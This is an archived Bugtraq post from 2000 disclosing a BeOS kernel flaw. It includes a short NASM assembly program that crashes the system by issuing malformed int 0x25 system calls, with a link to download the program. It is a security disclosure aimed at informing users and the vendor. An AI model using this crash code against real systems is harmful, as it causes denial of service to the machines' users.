Bugtraq mailing list archives
BeOS syscall bug
From: konst () LINUXASSEMBLY ORG (Konstantin Boldyshev)
Date: Mon, 10 Apr 2000 13:16:28 -0000
Summary: BeOS crashes when system call with invalid parameters is issued. Details: When using direct kernel calls through int 0x25 (not libroot.so functions) BeOS dies on most system calls with invalid parameters/stack. Allthough Be has registered this bug before R5.0, it is present in R5.0, and is present at least in all R4.5.x (http://bebugs.be.com/devbugs/detail.php3?oid=2324160). No fix is available, it's a kernel bug. Here's a sample assembly program that kills BeOS (nasm): section .text global _start _start: push dword msg push dword len push dword 1 ;stdout mov eax,3 ;sys_write int 0x25 ;must be a *call* to int 0x25, ;then everything goes ok; i.e. ;return address must be on the stack, ;but it is not mov eax,0x3f ;sys_exit int 0x25 msg db "hello",0xa len equ $ - msg (source and binary can be downloaded at http://linuxassembly.org/BeDie.tgz) References: http://www.escribe.com/software/bedevtalk/ - BeDevTalk archives (Feb-Mar 2000, search for topics "assembly & BeOS", "system calls", "system call stress testing" http://linuxassembly.org - Linux/UNIX assembly programming portal
Current thread:
- Re: IMAIL (Ipswitch) DoS with Eudora (Qualcomm) Jeff Beckley (Apr 06)
- Re: IMAIL (Ipswitch) DoS with Eudora (Qualcomm) Anthony Santen (Apr 06)
- A funny way to DOS pcANYWHERE8.0 and 9.0 Frankie Zie (Apr 09)
- Building a Bastion Host Using HP-UX 11 Kevin Steves (Apr 10)
- BeOS syscall bug Konstantin Boldyshev (Apr 10)
- Re: A funny way to DOS pcANYWHERE8.0 and 9.0 Christopher Schulte (Apr 10)
- Re: A funny way to DOS pcANYWHERE8.0 and 9.0 Ken Eaton (Apr 10)
- Re: A funny way to DOS pcANYWHERE8.0 and 9.0 Alesh Mustar (Apr 13)
- webplus security hole TalentSoft.Support (Apr 13)
- Re: A funny way to DOS pcANYWHERE8.0 and 9.0 Christopher Schulte (Apr 13)
- FreeBSD Security Advisory: FreeBSD-SA-00:11.ircii FreeBSD Security Officer (Apr 10)
- Re: FreeBSD Security Advisory: FreeBSD-SA-00:11.ircii matthew green (Apr 10)
- Re: FreeBSD Security Advisory: FreeBSD-SA-00:11.ircii Kris Kennaway (Apr 10)